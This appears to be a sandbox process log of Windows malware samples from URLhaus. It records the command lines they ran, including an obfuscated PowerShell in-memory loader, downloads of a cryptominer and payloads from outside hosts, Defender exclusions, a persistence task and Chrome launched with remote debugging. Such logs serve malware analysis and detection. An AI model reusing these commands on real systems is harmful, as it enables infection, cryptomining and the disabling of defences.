C:\Users\Admin\Downloads\UrlHausFiles\msf.exe

"C:\Users\Admin\Downloads\UrlHausFiles\msf.exe"

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Users\Admin\AppData\Local\palladiums\translucently.exe

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe

"C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe"

C:\Users\Admin\Downloads\UrlHausFiles\def.exe

"C:\Users\Admin\Downloads\UrlHausFiles\def.exe"

C:\Windows\SysWOW64\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5716 -ip 5716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 700

C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe

"C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4748 -ip 4748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4748 -s 732

C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe

"C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D30A.tmp\D30B.tmp\D30C.bat C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe"

C:\Users\Admin\AppData\Roaming\Bypass.exe

Bypass.exe

C:\Users\Admin\AppData\Local\Temp\Defender.exe

"C:\Users\Admin\AppData\Local\Temp\Defender.exe" /D

C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\131.0.6778.86_chrome_installer.exe

"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\131.0.6778.86_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\guiD7FE.tmp"

C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\guiD7FE.tmp"

C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0x27c,0x280,0x284,0x258,0x288,0x7ff7f4aa5d68,0x7ff7f4aa5d74,0x7ff7f4aa5d80

C:\Users\Admin\Downloads\UrlHausFiles\key.exe

"C:\Users\Admin\Downloads\UrlHausFiles\key.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1792 -ip 1792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1572

C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe

"C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe"

C:\Users\Admin\AppData\Local\Temp\is-FP5B3.tmp\stail.tmp

"C:\Users\Admin\AppData\Local\Temp\is-FP5B3.tmp\stail.tmp" /SL5="$1501DA,3886989,54272,C:\Users\Admin\AppData\Local\Temp\10000321101\stail.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause coder_media_11281

C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe

"C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe" -i

C:\Users\Admin\Downloads\UrlHausFiles\7z.exe

"C:\Users\Admin\Downloads\UrlHausFiles\7z.exe"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause coder_media_11281

C:\Users\Admin\Downloads\UrlHausFiles\Autoupdate.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Autoupdate.exe"

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe

C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1

C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{5B44AE37-3128-456C-9AC7-B4772D53A749}\CR_F72DC.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0x274,0x278,0x27c,0x250,0x280,0x7ff7f4aa5d68,0x7ff7f4aa5d74,0x7ff7f4aa5d80

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\win.exe

"C:\Users\Admin\Downloads\UrlHausFiles\win.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe

"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe"

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\ONHQNHFT.msi"

C:\Windows\SYSTEM32\rundll32.exe

rundll32.exe "C:\ProgramData\AMMYY\aa_nts.dll",run

C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe

"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe" /update "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe

"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe" /delete "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\Downloads\UrlHausFiles\System.exe

"C:\Users\Admin\Downloads\UrlHausFiles\System.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted.cmd"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted.cmd';$lAeq='GfZBCetCfZBCurfZBCrefZBCnfZBCtfZBCPrfZBCocfZBCefZBCsfZBCsfZBC'.Replace('fZBC', ''),'MaiPrpmnMoPrpmdPrpmulPrpmePrpm'.Replace('Prpm', ''),'CrIgJgeatIgJgeIgJgDeIgJgcIgJgryIgJgpIgJgtoIgJgrIgJg'.Replace('IgJg', ''),'EJqHmntJqHmrJqHmyPoJqHmintJqHm'.Replace('JqHm', ''),'EleDBwrmeDBwrntADBwrtDBwr'.Replace('DBwr', ''),'ChaFGFHnFGFHgFGFHeEFGFHxtFGFHeFGFHnsiFGFHonFGFH'.Replace('FGFH', ''),'TrFaEMansFaEMfoFaEMrmFaEMFinFaEMalBFaEMlFaEMockFaEM'.Replace('FaEM', ''),'IpACXnvpACXokpACXepACX'.Replace('pACX', ''),'Sssrbplissrbtssrb'.Replace('ssrb', ''),'DVGtReVGtRcomVGtRpreVGtRssVGtR'.Replace('VGtR', ''),'FroomPomBoomPasoomPe6oomP4SoomPtroomPingoomP'.Replace('oomP', ''),'ReaafWIdLafWIinafWIeafWIsafWI'.Replace('afWI', ''),'LIdMHoaIdMHdIdMH'.Replace('IdMH', ''),'CBGdXopBGdXyBGdXToBGdX'.Replace('BGdX', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($lAeq[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function PvrJj($TpxZW){$NbCzo=[System.Security.Cryptography.Aes]::Create();$NbCzo.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NbCzo.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NbCzo.Key=[System.Convert]::($lAeq[10])('wn6tmbO/rOORgxj74qEsSdU2WhE4KPXIqhTJPDz2aPY=');$NbCzo.IV=[System.Convert]::($lAeq[10])('gHqzXB7DsEnzxXPGoUcHcg==');$PddqI=$NbCzo.($lAeq[2])();$ySKdP=$PddqI.($lAeq[6])($TpxZW,0,$TpxZW.Length);$PddqI.Dispose();$NbCzo.Dispose();$ySKdP;}function rEEVf($TpxZW){$QUakK=New-Object System.IO.MemoryStream(,$TpxZW);$zUBgT=New-Object System.IO.MemoryStream;$PwRDy=New-Object System.IO.Compression.GZipStream($QUakK,[IO.Compression.CompressionMode]::($lAeq[9]));$PwRDy.($lAeq[13])($zUBgT);$PwRDy.Dispose();$QUakK.Dispose();$zUBgT.Dispose();$zUBgT.ToArray();}$lkrNY=[System.IO.File]::($lAeq[11])([Console]::Title);$aZZTu=rEEVf (PvrJj ([Convert]::($lAeq[10])([System.Linq.Enumerable]::($lAeq[4])($lkrNY, 
5).Substring(2))));$cSjRs=rEEVf (PvrJj ([Convert]::($lAeq[10])([System.Linq.Enumerable]::($lAeq[4])($lkrNY, 6).Substring(2))));[System.Reflection.Assembly]::($lAeq[12])([byte[]]$cSjRs).($lAeq[3]).($lAeq[7])($null,$null);[System.Reflection.Assembly]::($lAeq[12])([byte[]]$aZZTu).($lAeq[3]).($lAeq[7])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Users\Admin\AppData\Local\Temp\._cache_System.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_System.exe"

C:\ProgramData\Synaptics\Synaptics.exe

"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate

C:\Users\Admin\Downloads\UrlHausFiles\bp.exe

"C:\Users\Admin\Downloads\UrlHausFiles\bp.exe"

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAFIEGIECGCB" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_System.exe'

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\c3pool7.bat" "

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Users\Admin\AppData\Roaming\wget.exe

wget "http://quanlyphongnet.com/net/run.exe" -O "run.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys', 'C:\Users\Admin\c3pool\WinRing0x64.sys')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe'

C:\Users\Admin\AppData\Roaming\wget.exe

wget "http://quanlyphongnet.com/net/run2.exe" -O "run2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json', 'C:\Users\Admin\c3pool\config.json')"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffe9bf0fd08,0x7ffe9bf0fd14,0x7ffe9bf0fd20

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2092,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=2068 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=2016,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files\Google\Chrome\Application\131.0.6778.86\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\131.0.6778.86\elevation_service.exe"

C:\Users\Admin\AppData\Roaming\run.exe

run.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=2372,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=3264 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2240,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=3400 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4044,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=4064 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4696,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=4728 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4976,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=3940 /prefetch:1

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5D59.tmp\5D5A.tmp\5D5B.bat C:\Users\Admin\AppData\Roaming\run.exe"

C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe

"C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\clip64.dll, Main

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/xmrig.exe', 'C:\Users\Admin\c3pool\xmrig.exe')"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrator:(OI)(CI)F /t /c

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrators:(OI)(CI)F /t /c

C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe

"C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8700 -ip 8700

C:\Users\Admin\AppData\Local\Temp\Aplanogamete\IDRBackup.exe

"C:\Users\Admin\AppData\Local\Temp\Aplanogamete\IDRBackup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8700 -s 536

C:\Users\Admin\Downloads\UrlHausFiles\c1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\c1.exe"

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe"

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MkYwOUQ0OUEtRDIyNC00NEU1LTk1NjAtQkI5NDQ2MDEyM0QwfSIgdXNlcmlkPSJ7OTQ1MjhCNDgtNDg1RC00NjM3LUEyNDItNjcwQzUzRkUzRjY0fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezdDMjRFNERDLTc0MTUtNEM4Mi1CQUNGLTM4NTdEQ0FBODU3NX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNDLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTMxLjAuNjc3OC44NiIgYXA9Ing2NC1zdGFibGUtc3RhdHNkZWZfMSIgbGFuZz0iemgtQ04iIGJyYW5kPSIiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI1MiIgaWlkPSJ7REIyNEVERDMtOTkyMC01RDVGLUZCQkUtOEU3NDNGNzQ4NkMxfSIgY29ob3J0PSIxOmd1L2kxOToiIGNvaG9ydG5hbWU9IlN0YWJsZSBJbnN0YWxscyAmYW1wOyBWZXJzaW9uIFBpbnMiPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vZWRnZWRsLm1lLmd2dDEuY29tL2VkZ2VkbC9yZWxlYXNlMi9jaHJvbWUvYWRtZ3hsdDRkNWM1cmN0bm96dzN3enBodzJ3cV8xMzEuMC42Nzc4Ljg2LzEzMS4wLjY3NzguODZfY2hyb21lX2luc3RhbGxlci5leGUiIGRvd25sb2FkZWQ9IjExNjExOTQwOCIgdG90YWw9IjExNjExOTQwOCIgZG93bmxvYWRfdGltZV9tcz0iMjMxODYiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5NjcwNyIgc291cmNlX3VybF9pbmRleD0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9Ijk4OSIgZG93bmxvYW
RfdGltZV9tcz0iMjQ3NjAiIGRvd25sb2FkZWQ9IjExNjExOTQwOCIgdG90YWw9IjExNjExOTQwOCIgaW5zdGFsbF90aW1lX21zPSIzNzQxMSIvPjwvYXBwPjwvcmVxdWVzdD4

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe" -Embedding

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ondemand

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe9bf0fd08,0x7ffe9bf0fd14,0x7ffe9bf0fd20

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/nssm.exe', 'C:\Users\Admin\c3pool\nssm.exe')"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\AppData\Roaming\System.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\Downloads\UrlHausFiles\aaa.exe

"C:\Users\Admin\Downloads\UrlHausFiles\aaa.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im FLiNGTrainerUpdater.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe -Command "hostname | foreach { $_ -replace '[^a-zA-Z0-9]+', '_' }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

